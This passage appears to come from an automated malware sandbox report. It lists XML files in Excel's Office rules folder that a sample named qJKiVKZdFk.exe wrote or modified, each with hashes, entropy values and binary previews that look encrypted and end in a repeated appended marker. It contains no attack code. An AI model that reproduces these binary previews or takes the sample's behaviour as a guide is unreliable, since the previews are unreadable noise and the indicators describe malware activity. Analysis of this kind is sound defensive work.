                                                                                                                                      Entropy (8bit):7.802028298985458
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:JMoVBMr5Rxl5koefxzQnZpLutbPOkb9WvlZybApTTbD:ioVIRf5ko0KpLuZPD6lZN5HD
                                                                                                                                      MD5:A652EB8725D4517901D835CA7EEA4E3D
                                                                                                                                      SHA1:606B4156071D526B634EB77752EB1EB21C0AB93C
                                                                                                                                      SHA-256:29FC6F5C1879B1BE53B8E15E61E40F86EB5EEC5C83040DA9E7402D57EF6D7AC6
                                                                                                                                      SHA-512:DE682AFF977942B940CC703645390551BD30B21F29A19CE3ED681E6225F5CB7567E69E4C0C7BE3D692944A9F0CACA83AB0550743487FF9D24D98D7CD2DAE22C4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....sg&......p4:3.C!.S...L....Zb..c.y../.Y.^Q.8...vi..^E.V G..d.J........ ..\....QdA..l........r.G..&z..F....P.+.I......Yc.|..._...C .....K.h,...+.vmp\PA.....-.mi..ac3"..C0.ps...~..'...).....GD;.....O.7xQ,p.9...[GH.....2...D...3..@.U+^%..4..mtd...-..;.%.!..a.n..+[#..;....8(u...@.b....b...$wW..9....$.~...).\*...... ..Q..n........Bs.....L...Vq)2d.6X%.."pj....=E.....7kS..hT.dR[!....".Q..........;..sMx.b|m..s...GM..z'...G...s;.....?.m.....F..BB......RD.H/..."7.S.w..d.....h%..0;.5.rt.......x./..y.99M.*.p....E...zC.+.n.,.N.X.X.l......Lx...h.A....V.m..<..0..'6R.b..n..x2.T..f2$8..g.'F......_P......$x....O%....`..J...yI...X....z6.S........O.....Z...r.h...4x.....%Y..8...=].42..L.............#H.7.Us.CT.#s.....,.O....<~[s...K..<=...gm..w.b...5..i].O..\x8...d$T.A..Y.........................e5Tg.}...~...5.`.&s.......]...3. C....|1...5.....|..,.3..{.:m.t5.A.......\s..V&.......&.....E...b.......Z\_...?..B..d.....3.t....n..yrE..v&..&.. ......ON...rY

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240009v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):834
                                                                                                                                      Entropy (8bit):7.715314121816345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:3ubogmZpVx++jdHQy8WzQVdtWEdg+AUp7JlSQgpmvIit2cFU9LVTQLSLXk8dukIX:3Oozz5f36dtZgIptlqqBU9LRQLS4NbD
                                                                                                                                      MD5:C46D65EC0FEDF1A4C24EABF4343885F9
                                                                                                                                      SHA1:318C96E9094CA6A99D00D65CF9CF271383408341
                                                                                                                                      SHA-256:D453465A85DB53369D491994CDFB13E8CADEA1D8ADD872B42A912BBF49422193
                                                                                                                                      SHA-512:635AFE9B44A2C287C05D14BFBF9C86FC5646CB3E5ED16762484813BF99923CD6394ECE4ED4F8C7BCDD08A9743AC637296F98AAE3CAEA3A96AFE9FE3CA3356E4B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.u....)....]..H.hJ...............3...W")...z.%...\......u.q.aD....'.:..N..B...o....4tG.\}.....6Gy.|......%.Zi....|{....?v...7....;&..U........].iz0..J.D.p.8hpD*..O....-....w....)pN.#.i......c....o..nf3,H..O.m......".......?...L6H...MI.GP".u.N.....].#...........-.J0F.NZg,.......\6L..L-...Ef....D.g............f..r.-..gr.V ...q7.9!...R.C.H.........1F.b.^.....HZ....g.L..."|....8.9.]}.....[U.L.J.-;.HeX}.....n.a...E.....o..Y..g...Q;3...{....._FG........im.G...\..g.=...b.9..x.D.;&.2{.??..[.~\6.../#..1.zv/.;.T,.>.o.0.p..1..@..%...CU..I...q.K,{...qj6..h...@..b.D#.k.a.8.I..e.I......a.....1.H.._.5...oJ..k+r...LLE.b...F+.=....o...^...8' F..X.4.Z].K$~Z..wGA..X^.i)...^......%...9-n....6........F[P.?...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240010v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1006
                                                                                                                                      Entropy (8bit):7.776728243963383
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:yHVyb6ZSxSTj0chP6CYHG5hRy6WAnD6qUMbD:Sy0jRP66RyovD
                                                                                                                                      MD5:BBA428D679E80D5C7F259672620ECCAF
                                                                                                                                      SHA1:9F8F4608BF7E1D06425EF132462F5752A062BFA5
                                                                                                                                      SHA-256:9C66E86471C9DC52910F11BEDA9B717D5D1642819EE8D053223D0C920063A3B5
                                                                                                                                      SHA-512:A1DD2FB24C11FA57562DA784AD9FE762C8C815A9EFCD41EE58D3C97B2A19284E27214ED7F453D9FB1FD485E9F0EA9ECD5097A169CFDBE855E6A2537FCA694E5F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.#.......b..,.H.....B.M.[..*Zm0t6L.S..-"5.T..?..A...Ac0...7.PZ9.#N.uF.H...w...]......nJ.T......^\.!.......P[\f....ZC.d....O._....vn..0.A.-p..%,..=@&...y[<.S...q.3C...i...?...-dhU..5....`.K. Rx6..,In..K.l@..&5..J..:........vY.....<U...4]....8W....:........W....K..,g3-....*A.5aw..3Cl.~.z.l.X.6_..............#.Yx~9GS.W^....yn..Y4..l...,d8KO...?t......X-I....Y$...-......8.Q........v."....!.+.^&V.l..C..ly{..f.4....{./z$`....C.V.y..uE.!....W.|N.RT.D..-.i.........9C>....kx..<..A'*.....$.n.....(....HK...4W_..E..r+}.Aw.98.Y0.Wl.).....g...5.<'q..Z<..<5#..e..Q......ai..R............9...'.b.Q.i....:..7...h.....=.i<s..J.{`i.m......wTj...0..b..=.........%....R<.h"..S.84..fE5>......93....4##.g.I.....W.~.>N.?9`..c..T.II.f..q.+3]f........b}.}]RK....}{.....;.`W...C.h....f..?YB*V+Za.......-....@fN.Ex.....4..z.`.5....BF]./...2H.....;.. ...P.....K.LpZ....v..Q...".K.h.^Dj...."F.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240012v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1022
                                                                                                                                      Entropy (8bit):7.763709765574084
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YrqUnz5md3cZuA5bZsMDqpxrWWIVEYfKKcjEFGXpJbD:8Ud3WnZdeWWIVpcjEF+ppD
                                                                                                                                      MD5:EB03B111AA7C5F2A1C2D970A18DAAF81
                                                                                                                                      SHA1:C3E6AF98C0A409A98EDE6FB3EA78B99B6F6BDE37
                                                                                                                                      SHA-256:57D08BDCC08D9D716FA648CC8A2DADB098826EB9F6C8EFFD57F89416F60BCC47
                                                                                                                                      SHA-512:901565038C4CC071F57C6271077E7029FA62BC921022101C86E251C2823ABCC365EAB8AE5B09E552A7F05F9E265EF001E1513833EDBAB1C17A23FD7CFBFCC809
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml%.;)K..1.q..._.I.......-...C....&...DR.D.T......5.....3...D."..1.K.~.v.sX..>O)FB^.p.....v.......:L..0.{......X.CcO...C...m.\Wi....S..D.-}:.#.i.[...{Um.w.mh...b...dl>J.e........jv17R|..-...Z.2...dI$:..V_...it&.k......}.....Pa.....,..Q.$...........U.....E..,)...._.l..*.Cb:...R.m.0.<...b..p.S2C..<.BC....U.q.*l.9....kY.LC.A..[(.....)...9M.Lg..u&.kl.J.o..MD.cp.0.....*n...N..w..r}..T>......E.%j".....b......,$...`....C(\.........m.03.......9W..r.....GT.e.O}YB.3"....&.2...;.{_Zp.a=.0..I..P|F.....d}...X......[.'.t...m.o...O...bk..G..6...sK.....-.$.HT.m.....Y.C........a...\z.?a.....7....~..Y...5...6...Y.m.M%!...............E.....j/8\[$....^...u....S..aA..yV....7.@8....F.a..;6.2.}.h......w..9.RE."5s..+....+l../]..r..\NJa?,'R.....6>..n...N\^...n5..WY........y3......*...Y.B`5.^...N1.j....C....o.?F..3^S..,...u..e.00.....e....v.X....+...%......:..#....T.?.L.....{x..IAH.[.*..iZc..D..`T.B.r.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240013v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):831
                                                                                                                                      Entropy (8bit):7.7332231950919
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:gGVXiqKfaQWx2xTAvXMvU1DjalD9LySkqewSJbD:gMXlaaiT48c1ilhLytqexD
                                                                                                                                      MD5:B204E99B40F9A515B41BB7EB9C8C3869
                                                                                                                                      SHA1:4610E3B8823F4ECF43DDD626683EE4868706A65B
                                                                                                                                      SHA-256:0FABA4887F701FB81F168C87B892FC5BFC44F4BCB42F963A03E907647C3C3C44
                                                                                                                                      SHA-512:3A1B5390DE7502B6D96C7447725F79E7AC5DD86AC373089FB0DCD0C2438C4E35D1C64CD90F47DCEAFCBFAEAE9E7BA503BC335BECFFE724E016FA9B10D649E794
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml......r....V.....du...be).F..A.s.......aqF.D.-.6..d..x.%.eU.( ..^...!.qf.`.l..W.^bc.ow..:Q.]C;N0........+..Z...0.0f.Qy..V..B.B.b.c..e.6m*Q.H.i.p.%....P...<9T...>..%.../b.4.......z.R.F.t..YO?..C.~.g.J.!....I.,.Y.....6......W..gk.o..U).d..%.3K.xMJ....^......eU........:..[..v^.)+..rP.(.....~...y.....V6/.g...$1.m.[O.....).._}...F.."..S(%.J..@....;-....r.....\B..C..p..f..@r@....d5.vse'..S{...[M.3.X.......v.)...l.D..7.~?...._.].>a.>....1..-U.q.......4.:...Y(/.b.o.H......!Dh....|..Zm....lx|\...]G..b..|.7t..E.xe..v.P...j`.gY.&;.-2.EI%Zb...C.....,....{.x.A..R.B.A..Xh.\y>b....N..?!.j.Y.Ox....^..7yKV..Mv..O,QR....[<Y.. ...Y....w.8$.ik...MA......t......,..i.......l....a.e....E..v4..Cf...v.T.l..4.sd..<..i..V.b..6...>tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240014v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):834
                                                                                                                                      Entropy (8bit):7.72913007285245
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:/vM7tZuuJWQf2PrkkfvcExj7XwE5zU1LdibfQsJV+zd4oInrOTIeHCgyRdwXkduV:4ZRDyrk4cUrbB8WTy54oCRd3abD
                                                                                                                                      MD5:CB6706BDD1F2B96D8FB32469E56F830E
                                                                                                                                      SHA1:7441A3FE42D5D07C28FBC80EAA8A87CA2E564F37
                                                                                                                                      SHA-256:FF45CB14D155FF4F147F6FCDBBD3312D8AB039A46A663E43443245B9F61ABFDE
                                                                                                                                      SHA-512:EC49CCD351E57523A90CCA663E39E37C23C76A51B75766064F11CCB7E1CDD014BB099779A9D53E7697A9E42AA902A0CB77F775DBA87DF91647DFD5CC1664A6E0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlW...B9...~|=I.E.i...G.i.W....m...#s...Z0.{.r<.%.e&...za:.#._\..V./*..!Qh.Q.....DMb...\...H.~.R ..K.......i.h..d....0n.H,N....t5..h.".3.....%NQ.........Bxy..?...D.....p.A..%*..*....P.:.6J..gC....tn.r..._yx.........f.~n..f...Qp../".=.j...."E.1.t*.....,4..........u...Ga..p..:...'.z....mLj.v.OMT....`Lj._..nn....4um.y..-..0..y.*.jb.B...N..)......a......I...]V..52...%Y.=.....zG...N=../..._`..T?..j......?h.......^.*..P/..\*...aa9....9......X...3.i.........=.9....l.O.J...|....6..F..EY..Hx5.W..<....@.N..z.>.7..|..HT.x......n...a..vO9....4,.=.t.....gF.....8.s.......)...t..O........L.. ..&..3T1s(..E.......b#Y%$B.a.C*.C.x..i$.T...^>..pF&../.!...M.{....2..X..n(az.\M.....n.g...D..V.hN....0..oG.E."+....i...i....v..?.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240015v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):759
                                                                                                                                      Entropy (8bit):7.670974581653447
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:wk/oH4STdofjEZGiCSqgPUdHft7R+8BD+9Ucp/qnukIcii9a:wkkR+wZuSqgutV+4D+WcprbD
                                                                                                                                      MD5:1C620827F89236E5923928920621EB3A
                                                                                                                                      SHA1:DC071A1E03B96F40A3459C5B2EAC9BF30CBE3CD6
                                                                                                                                      SHA-256:3B6E0032F16BC4D00B9E1A749B7207B485658BA109F290AB7C4816EF694DC5D5
                                                                                                                                      SHA-512:F183DEEF2BF493604B6EC56695A79BAC29CD71E33438A9ADE5FE2859CD4A0CC68F615836BDA35D9F705D2E7178E979A01626E069B33FD8C5FDD8EB17475FBF3B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....-.h......u..b..k.J%..O......E............tp.UTzA.D.N..s:.%_?Xy.(R=..h._.5....W....6..`n.\.,..aT..0sd2.[`.D.i.,zcS..bn....-....*?.gO.p+*B..CT#i......O...p..~.T%...7i].h+]./.\!.'-....G..:...d....[y..ez.9........Q...]%`._..V....F......sJP.{Q).D..g....k.!e...U.......f..v(.......Mi...k9...K.t...n-.Pf~|?....nN..t..g..#*../...M.z3.....Do+./.-./}.5..~.........H..\.#.5..>.]k..DF..........[........HI...j..^g...W....A4@[...6.n..X..4?~..|.OHv.m.?s.#..\..g+...m=...'.v.,SOR....u.t.iyS<l.Y..d.......KI.M.`]J.J..R...D.....z....dmH...a...E..|*.m.4.,.\w.'BIz.W.....Y......g.h....{..}..5F...N.....4....}..LdH-vdor.....ck.{.....n#.....j...'.T).).h..E+.'a...3tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240016v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):852
                                                                                                                                      Entropy (8bit):7.766286942462333
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:azQxUACW311T9fooSTvWj0+9eNqP9FyS2PzwmEvPHWbD:SACc1D7SoaEfySyfEvPkD
                                                                                                                                      MD5:FB1E7BE843D3DB6C3D0BFEECD1C16C65
                                                                                                                                      SHA1:F9752BFF01FAD86788D55003ABD3A591D0ABDE91
                                                                                                                                      SHA-256:87AF213437A263AD0E075F4B62DE33DB05CD79993DB8BB1533392F5A2602BB37
                                                                                                                                      SHA-512:E0072EAC8B24FBB77C71DEAE469907007F867207B8178B6CEB3ADF80CCC94DD099C3F2B9538C93B84471F16EC280D8822D0F7BAB7676B02AB07E0B21F647F74D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlg.]...R....C...i6....L..1...Qd.....k....H.....su0[..49....!.y.8.r.y=..Y{.>L...]i.....6.o...A!_.=.../.......bf..R.Z...U.....)........Y..=.iA......?.d.r.x...I.y.B...........6...............U.].qM.+....w...z.T{.u6.,...L..~&_so..T..........<...L[. !...Qc..........f.j....SU....l:"...yc'.L:T....E..]Fy..I...n.p`.....-.&...v_....[...%].&E..&.3..R.&..j.u....4..X.e..u5..4.....u..#.....%.(...> (.h.s.7...V.....i.G...Z.D...N....NH.....'...3...Q.J..o.8WI6.H.].2..1W..1.<......."............<.D....s.vX..".qT*:.."..0ED.]I....I.Y...0;...)NZ.......;@.).30..:.`..l.O..6./.w....{..IFOv[..YX...T/.p..s.id.~..d..;.,`6n3...0...|.2.."M*...B..,>..^.v.....i|X..PC..M4%{......)Cx.l...W...M.M...1..(.Q2.....|7.........@)9.b.H..P..@Hf.tW.EAu,.^9=.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240018v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):971
                                                                                                                                      Entropy (8bit):7.7976267760356635
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:QLkUE+bPRSAbXR/KJrajArguIpBMBeHMGsU7TbD:QvhbpSAbXR/uajWguIXEesG17HD
                                                                                                                                      MD5:A301B3DB6D2BE9D3032599090F0D270F
                                                                                                                                      SHA1:AB4F8618E174D38901E1F456D3CC22CE05C9F288
                                                                                                                                      SHA-256:412825B79392E92542CC3C5AFFD27D285D2A0F31B5D77AD828F8953BDFE13BBF
                                                                                                                                      SHA-512:5A5AC158CCAFCE1ACA2A4C965F7B0C73E163F7FE85639111B7FEEA59EDBE087ED48668759864468A4C92D892E8AF1555F8B33566FE08CDCE0EF7A6F022D310A4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml).^.w....=..g.l.8.G...nl..i8a..!.dpKf..!...c.GizW.....-...NUrH;.b@....C..a6;..m......_....Et.8....&..4...:7.I.MHo.A.Q..V.p....B..H0?.....i..!.).n^.[...ny..k....1H..UT....3...m..9Z9..H.U..e.......WTD.....4Si1^.....t.2..k........+..Rx0..%D.............k..&c.....ce...f.P6..ru......i@PI..y..i.v..`.H...U..3t.....!..eV.7q..X1.%.jX...9...u6..N..$..}.f}..f..v...$y7..Q.J.1..."....S<..B.....).v.j.qd.k|O.E`....(.u(.`=g..:8~v.NP....61s..q......3..A.'|(...qt.?...h_:H.....Et.v/.I...lI..%$..v...`.x..{.a.....U.> ....rWw].pcN.J....E.^.?y......1.....G.K....e.....P..s..c:.....5k.K...D...F3...<4.....]j..d8.O."._..wr.r.../.......D.}._.N.gb".Wt(ZM...Y..#..Uqq....ci....m....=y.W.X..g...........R..b.a.;.&.#..%.#>D..?S2;.m..j..co.o&..;..m!.....xh.&..K.~...9es`^..}pv.r....p..Z.~...:@.....`...B6&........Q=:R....abz'...N.j.y].T...B...._.......R...5.yz....stp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240020v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):941
                                                                                                                                      Entropy (8bit):7.774366844488087
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:0PgII3ZEG6ZERAMYquZ/uoHYUQTmPfebD:0PNIJEG6Zc3Yd/u3XCcD
                                                                                                                                      MD5:65809DE275441C6789571BB9B05A4DD9
                                                                                                                                      SHA1:7486A5A151B1AF177BEF546AFE9965A664236EC6
                                                                                                                                      SHA-256:64D181AE393377A31E9552833C136C0E2ECC4AB4745D5BE8E9E7F2884373D095
                                                                                                                                      SHA-512:0DD22B7C738FD50AE4A136C7F2AC3A4C3A0D5F060742621485FEFBAD503E9503C1DBB83E01B8F05C4C2A461D8062F973D06F02595CC9568C9D00F5C4DA1D0173
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....M.8..........y.'..y..H.m.v%....~.h&.u.2.b.'...t_..eT...H.w...J{..J|.%.le..........B..-...lV..$.{]j..qr..W......s.V.gG.........[C..&....o..............U+<..$.........u.]..S..&...Xb..1..... 8...%.=J..D.T.....*h.8.v#...l-B&tDr<.9.#..\...!1L/.3.WXu.....)..$.B&.....*..0s..H.#...U.V~........,.I.....Q..E..^.u...ZO$..b.....:..+s.eO....'.-....L...H.b....O.~..`K..F.6U....2..w.Ln.........H.....Z.(..%..gk.bJJ;..9.......z....T....~z8.....K.+...S..O...%....KRf..m....x4R....JJ......].l...LpT|...N.i.i..)k....&.%..4..d.J..."-.Bh.%.I.tv.2......].v1R....{^..qU^....."Sv..s..T..br...\.>......TT..Xn..Q...7..........N_M5..~.~.~....zm.#..>.~...R..|.-...8....*...7i,.p......[$..@.....2..U..@...,.(...b."....;1J...Y.?.7_$9......H..!..]...`....y.h.$..-$W.8.uz_..Md}X..*|._...w..C.K..9.D?.V.....I.Bz..v....o....>.?.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240021v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):945
                                                                                                                                      Entropy (8bit):7.819710281731448
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:4RHFr0LcfZIy1TmcB8SZxbboM13LBsSpCltWSNVHJnLTLUbD:kpfZIuHzZxbF3xpIHJ/qD
                                                                                                                                      MD5:FA8ACD43D5D992817A8EB537BCCD139F
                                                                                                                                      SHA1:9973802A76A7AC7BFCC27AA3C1B3DBD77F8432E4
                                                                                                                                      SHA-256:168453BB6E812287B5DC99C0E9AB2615AF23DCDEC793971F5605F3BD0EF671CD
                                                                                                                                      SHA-512:71F91E2AD4DD4FB22D6C35222C9A5D4444150B776C8C529A7404E45D52190F5B5EAC7B481211A1740639C896826336F9EAA25E59A67ACC52F9CAB8F4E7DEBBAE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.G....rv...|X.c.f...>..f.~M}........H-.>.'..g.....K.b.....[v&.4...e5.!.I]..QY@k9`.y#[...?.+Y..fd.FA.!).1uK..l..F.^.....D...y....AJo.P..@S..E..HX..+.......H..0L$^..l.\..._....o.8...w..5.)..........e:.g...7.9..G.......,...#......s.y.....{.g..n...8*V.....E..{.{....I.b>...+....9.[............;vV.Ze..........i...Tb..||......ozR..t...Jy....._...AP.zZ..[..........\Jy.8.....{\A....&............!....#.j..@....Zn..J....2...|^.M..l<.V.;..k.....KF....N............73.R....$!...N.0..:>....GS.I.w.%-.p7.C..w ..\.G...f\.+t.h.<..E.F.a..ly1A|....tBq........W....Z.e.9..+..v.....l......8.n.U.=./h.,!...(=}.wR:..........v..J:....X.b..b.......IN.f..~U.+I/...(.Y`.c@.2...7....*mT....9.!.d.....{.po...|...t..l~..%.G6.....u._....T.%.W....,..&.*.C..P)........:....){j...1...$7._......iO.YAH.0O.E.K.......i..0..@.u.4...6Tg..u]...=.3...R'.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240025v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1639
                                                                                                                                      Entropy (8bit):7.8678037153266365
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xVgXsGFNV18ZkZBK0L2yVI25vyCm5j0zGD:xQsGFNAUBK0L2qi5j0q
                                                                                                                                      MD5:4C1A4F62813353965D4661BE3A7C68E4
                                                                                                                                      SHA1:A91DC73AEA149B580CAC90C5A900FDCB9B88767B
                                                                                                                                      SHA-256:4122E59F5816404C1008E3A2BA2F445E5EB7D6E678201696B3C34917730947C4
                                                                                                                                      SHA-512:C65CF3A35D283C819136E30CB6AB1C9AFF96E473FF65688D8C0AB3D7F091EE61FA271D49A780D4B8E30659CAA17302C1845CA41FD06C4312F7C9CC3379C84A50
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlH..#..U.La..QA..v......'z.,....2.+.*8....7.............../.Qc....nE..!.x..#D...!.)+.`._...rnPh'.....v{2....r..3Q...JD`..3.vTfA..>z....C...S..B.fu...bi.*P..rV#..:b...0...j.(.....F..v$0x9X.6..........st....T...qt.^......<7.9..2.e..m....Af.#2...s!.....aeN...m[BZ.......DC..L._.k....J......^J..X../.*.....caI.P...0...0.a.S..g...W..K*.g>.~w.W%~%........6.U.-|..g_....*.,.\%%k..S..qB2.A'F....=o.....K...l@Z......n...8...I........{b.BP....'j...>...`b.2.g.....r.!...vH....^...U4.IM..(.\nR...;./t...L.1.t....j...)..&.5W....qS.....@.X...0..'~.|.a.IS3...c...!...a`.c........4j........-.........l...._....T...eh.GQ..0>8...u.(......~..wmm.......]...".....f.6...?S>."..M.?%7..u....Orw.?.|.nC.@.%...U....L't@.g.oF.d...TA...E.S...4...x.r..[.#....f|.h[..d..m(.#.(..5..d.1...5S.......1..040.o..B...*.........Z.....'..h........w.V>..$(.e.G.<K.|......[4.A.....Z"..;.B..F$...I...B.=.C...$........tHh...Q...?E.....kkd....0...M....m..p..m......s...{..g.u8..GFs....q.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240026v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):7026
                                                                                                                                      Entropy (8bit):7.976615842671481
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:BLnbxlxVG1VJqAkOgHX5SCiQMLWtMxPEtqxWI:BLdlxVEqAqXE5pLa+EtgX
                                                                                                                                      MD5:96C55DEBA2EE6D41A631E1CEE9E82846
                                                                                                                                      SHA1:36AFE4FBAEA03A8E918F175A764891177D0993BA
                                                                                                                                      SHA-256:4DAA12676FB883363B19F1243216FC2BBEAE1917749062352D5DE2B759ED5305
                                                                                                                                      SHA-512:BB5C130E0E108D2169AF6180742B286B349BEC3AF2D41A1D25E8A856F0DCC0696B53EC82F0D923ED5EB289F5CED3C6195918E30BEA0980D0C76B06FC008C05FA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.a...4...Di..SZu..3.*.0.?ek.7..<...j.F..+.....g....X.jf..`WL...g.v.kK..I.............Wx...{..r^.....V.F.....S..1..=P.....>k.._...U.Tz.hF...X....d..V./5.XH...y.*.~.@rf..c3.j.dr]8`..e.A.D$.U.!.X..x-..L.J)#.#..(F...F!..h>..p...&B82.;T.2...o/K.uu'.....p.-.?..$.0...Q...I4......((..b.s.]Z?Mm..S.%......Q;Aa....g.Nsc....6..(.g..6R..yD.v...)5HY....-Ua.pr..CG.X..$`l..e...7#4...OO....Bc...bJ..$<....:.........^...~.7~....;t.fH.<.....~.B.....U...9q44..u..-P(.......A..A.N.k.c..I..h..!g..h..tO..R..eG ..QZ.d.K.B.VI..A:g(0b.?$...)]......0l..n-...5..!....J.t.>M...*>..U8&.z...BF+.....%1.|.^.........9.3....&...P.*<$}.b..2.{b....U"..N.:X..9.p[2.A.I..^zf.2..ET....p:.{._H@I$*n..)&B..........-....f'|......U...y.......D....B.....p.t....g-..UqxA.}...~....c....H;.r.(X......,,.KI.m.}m.o..r..Dc.,Ab.Q.](k.W.d.0.C....,..W.~..."..BN...p.!..;.-7...Ac.n......|aE.....7.-wu..(..?....<=..O..0[."..g...&^.A....NV.pY..d.%L.vW.....8Jj..5W..E.Z...Q.P..Y...r3ig..(@VL

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240029v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):845
                                                                                                                                      Entropy (8bit):7.71342981234005
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:aXM4O6XKVW2kFIW/BR7VRFxf9weawJs+oRY4QbvyRBBmDZZzw8q2a92+MeYukIcq:u5KVWjFPB5V7rwePbh4QqBBmbzwL7bD
                                                                                                                                      MD5:91168A14FA96F6BC744EA6F60C72C7D0
                                                                                                                                      SHA1:6ACDDCE8B65943D83BD9FE0043CC97CA6AB74904
